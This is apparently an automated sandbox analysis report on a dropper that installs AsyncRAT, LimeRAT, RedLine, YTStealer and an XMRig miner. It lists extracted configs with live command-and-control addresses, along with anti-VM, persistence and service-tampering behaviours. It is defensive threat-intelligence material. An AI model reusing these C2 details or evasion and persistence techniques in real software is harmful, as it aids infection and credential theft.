asyncrat | 6d6ebf1870d5d9c6bfebdc9fee3a3f381f86b32770f34df41364f905a489486c

Resubmissions

06-09-2022 03:04

220906-dk2dasbcam 10

24-08-2022 20:26

220824-y7t8qaaffp 10

Analysis

max time kernel
129s
max time network
145s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
06-09-2022 03:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a18193c95d0c31ab132d9bc2da884d7c.exe
Size

22.0MB
MD5

a18193c95d0c31ab132d9bc2da884d7c
SHA1

063e58b4b3b920e68006d4d28625df894e20750a
SHA256

6d6ebf1870d5d9c6bfebdc9fee3a3f381f86b32770f34df41364f905a489486c
SHA512

1c5119a13ddbbe2293759e5cd66de8747abba98d46aa9883c1ccadb489a2cf54be58766aa157fd383a6f631c9265d7b873c068fd992c6dc592ab32a6afd10547
SSDEEP

393216:TJWrtpiMPeMNKxIyMMUGJQmNVmIRKGl5X1+moeWJIYR22uYZm:kpWMtMUJ+KG3XsmOZFpm

Score

10^/10

asyncrat limerat redline xmrig ytstealer @miroskati discovery evasion exploit infostealer miner persistence rat spyware stealer upx vmprotect

Malware Config

Extracted

Family

limerat

Attributes

aes_key
123
antivm
true
c2_url
https://pastebin.com/raw/mchxnAbT
delay
80
download_payload
false
install
true
install_name
WindosCert.exe
main_folder
AppData
pin_spread
true
sub_folder
\
usb_spread
true

Extracted

Family

redline

193.124.22.40:19788

193.106.191.106:26883

193.106.191.16:28958

62.204.41.141:24758

Attributes

auth_value
c16799aa992748b357b66c7f81245e70

Extracted

Family

redline

Botnet

@Miroskati

litrazalilibe.xyz:81

Attributes

auth_value
384ebbf9bd4d7e80bf3269909b298f87

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 10 IoCs

resource	yara_rule
behavioral1/memory/4092-470-0x00000000009A0000-0x00000000009FD000-memory.dmp	family_redline
behavioral1/memory/401400-482-0x000000000041ADCE-mapping.dmp	family_redline
behavioral1/memory/4092-508-0x00000000009A0000-0x00000000009FD000-memory.dmp	family_redline
behavioral1/memory/401400-599-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/78368-652-0x00000000001FB50E-mapping.dmp	family_redline
behavioral1/memory/175000-684-0x000000000041B53E-mapping.dmp	family_redline
behavioral1/memory/78368-781-0x00000000001E0000-0x0000000000200000-memory.dmp	family_redline
behavioral1/memory/175000-806-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/363068-943-0x000000000041B53E-mapping.dmp	family_redline
behavioral1/memory/363068-983-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

YTStealer
YTStealer is a malware designed to steal YouTube authentication cookies.
stealer ytstealer

YTStealer payload 3 IoCs

resource	yara_rule
behavioral1/memory/382288-2580-0x0000000000010000-0x0000000000E22000-memory.dmp	family_ytstealer
behavioral1/memory/382288-2592-0x0000000000010000-0x0000000000E22000-memory.dmp	family_ytstealer
behavioral1/memory/382288-2631-0x0000000000010000-0x0000000000E22000-memory.dmp	family_ytstealer

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 5 IoCs

rat

resource	yara_rule
behavioral1/files/0x000400000001a4df-169.dat	asyncrat
behavioral1/files/0x000400000001a4df-283.dat	asyncrat
behavioral1/memory/4720-325-0x0000000000890000-0x00000000008B2000-memory.dmp	asyncrat
behavioral1/files/0x000600000001ac36-2741.dat	asyncrat
behavioral1/files/0x000600000001ac36-2768.dat	asyncrat

Enumerates VirtualBox registry keys 2 TTPs 10 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo	COM Surrogate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService	3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	COM Surrogate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest	COM Surrogate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse	COM Surrogate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService	COM Surrogate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest	3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse	3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo	3.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	COM Surrogate.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__	COM Surrogate.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__	COM Surrogate.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__	3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__	3.exe

Looks for VirtualBox Guest Additions in registry 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	3.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	COM Surrogate.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/385580-2614-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/385580-2705-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	6.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updater.exe

Executes dropped EXE 21 IoCs

pid	Process
4720	1.exe
4784	2.exe
5084	3.exe
3428	5.exe
1520	6.exe
4956	7.exe
4272	9.exe
4832	11.exe
3672	10.exe
4092	8.exe
4240	v0.7.exe
103536	Setup.exe
111776	Setup.exe
132760	SLAYER Leecher v0.7 .exe
249904	svchost.exe
106732	COM Surrogate.exe
162764	svchost.exe
381284	updater.exe
382288	start.exe
389304	UpdateChromeDay.exe
395884	WindosCert.exe

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
385564	icacls.exe
380164	takeown.exe
380280	icacls.exe
385548	takeown.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000800000001ac2d-2573.dat	upx
behavioral1/files/0x000800000001ac2d-2572.dat	upx
behavioral1/memory/382288-2580-0x0000000000010000-0x0000000000E22000-memory.dmp	upx
behavioral1/memory/382288-2592-0x0000000000010000-0x0000000000E22000-memory.dmp	upx
behavioral1/memory/382288-2631-0x0000000000010000-0x0000000000E22000-memory.dmp	upx

VMProtect packed file 10 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/memory/2636-150-0x0000000000400000-0x0000000003579000-memory.dmp	vmprotect
behavioral1/files/0x000800000001abed-185.dat	vmprotect
behavioral1/files/0x000800000001abed-184.dat	vmprotect
behavioral1/memory/5084-233-0x0000000140000000-0x000000014085E000-memory.dmp	vmprotect
behavioral1/memory/2636-333-0x0000000000400000-0x0000000003579000-memory.dmp	vmprotect
behavioral1/memory/5084-406-0x0000000140000000-0x000000014085E000-memory.dmp	vmprotect
behavioral1/memory/5084-553-0x0000000140000000-0x000000014085E000-memory.dmp	vmprotect
behavioral1/files/0x000600000001ac1e-547.dat	vmprotect
behavioral1/files/0x000600000001ac1e-548.dat	vmprotect
behavioral1/memory/106732-872-0x0000000140000000-0x000000014085E000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Control Panel\International\Geo\Nation	3.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
380164	takeown.exe
380280	icacls.exe
385548	takeown.exe
385564	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Intel Security Corporation = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\svchost.exe"	Setup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log	updater.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
2636	a18193c95d0c31ab132d9bc2da884d7c.exe
5084	3.exe
106732	COM Surrogate.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4092 set thread context of 401400	4092	8.exe	93
PID 4956 set thread context of 31820	4956	7.exe	94
PID 4784 set thread context of 78368	4784	2.exe	100
PID 4272 set thread context of 175000	4272	9.exe	101
PID 4832 set thread context of 363068	4832	11.exe	103
PID 381284 set thread context of 385580	381284	updater.exe	165

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
385296	sc.exe
385328	sc.exe
385312	sc.exe
31904	sc.exe
379164	sc.exe
379280	sc.exe
379492	sc.exe
379608	sc.exe
385180	sc.exe
385340	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
227532	132760	WerFault.exe	89

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
389008	schtasks.exe
395720	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
389088	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	3.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

pid	Process
381012	reg.exe
385716	reg.exe
386356	reg.exe
386560	reg.exe
380984	reg.exe
380100	reg.exe
385428	reg.exe
380044	reg.exe
385352	reg.exe
379804	reg.exe
379972	reg.exe
381060	reg.exe
381040	reg.exe
385364	reg.exe
385376	reg.exe
385492	reg.exe
379732	reg.exe
385612	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2636	a18193c95d0c31ab132d9bc2da884d7c.exe
2636	a18193c95d0c31ab132d9bc2da884d7c.exe
5084	3.exe
5084	3.exe
5084	3.exe
5084	3.exe
16032	powershell.exe
16032	powershell.exe
16032	powershell.exe
16032	powershell.exe
2096	powershell.exe
2096	powershell.exe
16032	powershell.exe
16032	powershell.exe
2096	powershell.exe
106732	COM Surrogate.exe
106732	COM Surrogate.exe
2096	powershell.exe
106732	COM Surrogate.exe
106732	COM Surrogate.exe
175000	AppLaunch.exe
363068	AppLaunch.exe
78368	AppLaunch.exe
1520	6.exe
379252	powershell.exe
379252	powershell.exe
379252	powershell.exe
380504	powershell.EXE
380504	powershell.EXE
380504	powershell.EXE
381348	powershell.exe
381348	powershell.exe
381348	powershell.exe
381284	updater.exe
385580	explorer.exe
385580	explorer.exe
32012	powershell.exe
32012	powershell.exe
32012	powershell.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
385580	explorer.exe
4720	1.exe
4720	1.exe
4720	1.exe
4720	1.exe
4720	1.exe
4720	1.exe
4720	1.exe
4720	1.exe
4720	1.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
600	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	16032	powershell.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeIncreaseQuotaPrivilege	16032	powershell.exe
Token: SeSecurityPrivilege	16032	powershell.exe
Token: SeTakeOwnershipPrivilege	16032	powershell.exe
Token: SeLoadDriverPrivilege	16032	powershell.exe
Token: SeSystemProfilePrivilege	16032	powershell.exe
Token: SeSystemtimePrivilege	16032	powershell.exe
Token: SeProfSingleProcessPrivilege	16032	powershell.exe
Token: SeIncBasePriorityPrivilege	16032	powershell.exe
Token: SeCreatePagefilePrivilege	16032	powershell.exe
Token: SeBackupPrivilege	16032	powershell.exe
Token: SeRestorePrivilege	16032	powershell.exe
Token: SeShutdownPrivilege	16032	powershell.exe
Token: SeDebugPrivilege	16032	powershell.exe
Token: SeSystemEnvironmentPrivilege	16032	powershell.exe
Token: SeRemoteShutdownPrivilege	16032	powershell.exe
Token: SeUndockPrivilege	16032	powershell.exe
Token: SeManageVolumePrivilege	16032	powershell.exe
Token: 33	16032	powershell.exe
Token: 34	16032	powershell.exe
Token: 35	16032	powershell.exe
Token: 36	16032	powershell.exe
Token: SeDebugPrivilege	162764	svchost.exe
Token: SeDebugPrivilege	175000	AppLaunch.exe
Token: SeDebugPrivilege	363068	AppLaunch.exe
Token: SeDebugPrivilege	78368	AppLaunch.exe
Token: SeDebugPrivilege	1520	6.exe
Token: SeShutdownPrivilege	379080	powercfg.exe
Token: SeCreatePagefilePrivilege	379080	powercfg.exe
Token: SeShutdownPrivilege	379188	powercfg.exe
Token: SeCreatePagefilePrivilege	379188	powercfg.exe
Token: SeShutdownPrivilege	31908	powercfg.exe
Token: SeCreatePagefilePrivilege	31908	powercfg.exe
Token: SeShutdownPrivilege	379424	powercfg.exe
Token: SeCreatePagefilePrivilege	379424	powercfg.exe
Token: SeDebugPrivilege	379252	powershell.exe
Token: SeIncreaseQuotaPrivilege	379252	powershell.exe
Token: SeSecurityPrivilege	379252	powershell.exe
Token: SeTakeOwnershipPrivilege	379252	powershell.exe
Token: SeLoadDriverPrivilege	379252	powershell.exe
Token: SeSystemProfilePrivilege	379252	powershell.exe
Token: SeSystemtimePrivilege	379252	powershell.exe
Token: SeProfSingleProcessPrivilege	379252	powershell.exe
Token: SeIncBasePriorityPrivilege	379252	powershell.exe
Token: SeCreatePagefilePrivilege	379252	powershell.exe
Token: SeBackupPrivilege	379252	powershell.exe
Token: SeRestorePrivilege	379252	powershell.exe
Token: SeShutdownPrivilege	379252	powershell.exe
Token: SeDebugPrivilege	379252	powershell.exe
Token: SeSystemEnvironmentPrivilege	379252	powershell.exe
Token: SeRemoteShutdownPrivilege	379252	powershell.exe
Token: SeUndockPrivilege	379252	powershell.exe
Token: SeManageVolumePrivilege	379252	powershell.exe
Token: 33	379252	powershell.exe
Token: 34	379252	powershell.exe
Token: 35	379252	powershell.exe
Token: 36	379252	powershell.exe
Token: SeTakeOwnershipPrivilege	380164	takeown.exe
Token: SeIncreaseQuotaPrivilege	379252	powershell.exe
Token: SeSecurityPrivilege	379252	powershell.exe
Token: SeTakeOwnershipPrivilege	379252	powershell.exe
Token: SeLoadDriverPrivilege	379252	powershell.exe
Token: SeSystemProfilePrivilege	379252	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2636 wrote to memory of 2096	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	66
PID 2636 wrote to memory of 2096	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	66
PID 2636 wrote to memory of 2096	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	66
PID 2636 wrote to memory of 4720	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	67
PID 2636 wrote to memory of 4720	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	67
PID 2636 wrote to memory of 4720	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	67
PID 2636 wrote to memory of 4784	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	68
PID 2636 wrote to memory of 4784	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	68
PID 2636 wrote to memory of 4784	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	68
PID 2636 wrote to memory of 5084	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	76
PID 2636 wrote to memory of 5084	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	76
PID 2636 wrote to memory of 3428	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	75
PID 2636 wrote to memory of 3428	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	75
PID 2636 wrote to memory of 3428	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	75
PID 2636 wrote to memory of 1520	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	71
PID 2636 wrote to memory of 1520	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	71
PID 2636 wrote to memory of 4956	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	72
PID 2636 wrote to memory of 4956	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	72
PID 2636 wrote to memory of 4956	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	72
PID 2636 wrote to memory of 4272	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	73
PID 2636 wrote to memory of 4272	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	73
PID 2636 wrote to memory of 4272	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	73
PID 2636 wrote to memory of 4832	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	74
PID 2636 wrote to memory of 4832	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	74
PID 2636 wrote to memory of 4832	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	74
PID 2636 wrote to memory of 3672	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	77
PID 2636 wrote to memory of 3672	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	77
PID 2636 wrote to memory of 3672	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	77
PID 2636 wrote to memory of 4092	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	79
PID 2636 wrote to memory of 4092	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	79
PID 2636 wrote to memory of 4092	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	79
PID 2636 wrote to memory of 4240	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	82
PID 2636 wrote to memory of 4240	2636	a18193c95d0c31ab132d9bc2da884d7c.exe	82
PID 1520 wrote to memory of 16032	1520	6.exe	85
PID 1520 wrote to memory of 16032	1520	6.exe	85
PID 4240 wrote to memory of 103536	4240	v0.7.exe	87
PID 4240 wrote to memory of 103536	4240	v0.7.exe	87
PID 4240 wrote to memory of 111776	4240	v0.7.exe	88
PID 4240 wrote to memory of 111776	4240	v0.7.exe	88
PID 4240 wrote to memory of 132760	4240	v0.7.exe	89
PID 4240 wrote to memory of 132760	4240	v0.7.exe	89
PID 103536 wrote to memory of 249904	103536	Setup.exe	92
PID 103536 wrote to memory of 249904	103536	Setup.exe	92
PID 103536 wrote to memory of 249904	103536	Setup.exe	92
PID 4092 wrote to memory of 401400	4092	8.exe	93
PID 4092 wrote to memory of 401400	4092	8.exe	93
